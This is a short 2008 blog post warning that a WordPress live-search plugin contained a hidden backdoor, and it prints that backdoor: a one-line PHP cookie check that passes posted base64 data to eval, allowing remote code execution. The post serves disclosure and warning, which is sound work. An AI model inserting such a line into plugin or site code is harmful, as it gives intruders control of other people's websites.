New theme continued: why not to trust plugins

DelGurth | Friday, October 31, 2008

With this new theme I also saw that it was compatible with the “Addicted to live search plugin”[1]. (Un)fortunately this plugin doesn’t work out of the box either, at least not if you do not have Wordpress running directly in the root.

But… Since I was looking at the code to fix this I also found:

<?php if($_COOKIE['7b13cc987791f418']=="6d6bedf94c36d538"){ eval(base64_decode($_POST['file'])); exit; } ?>

No thank you very much!

So what did we learn: Never ever trust Wordpress plugins… So do not use this (version of the) plugin, unless you know how to remove this piece of code!

I’ll check out after some sleep what Wordpress has to offer when you find a vulnerability like this in a plugin, so perhaps users of it can be warned… And I’ll fix this plugin later also, to be continued…

Update: it seems that it’s fixed. Although I’m not sure how the Wordpress auto-update feature could create a line of code like that (as in, this sounds like bollocks to me).


[1] Funny sidenote, I found this blog two years ago and commented on one of his articles on Oracle.

Categories
Wordpress
Tags
, ,
Comments rss
Comments rss
Trackback
Trackback

« New theme New theme part III »

Leave a comment

You can use these tags : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="">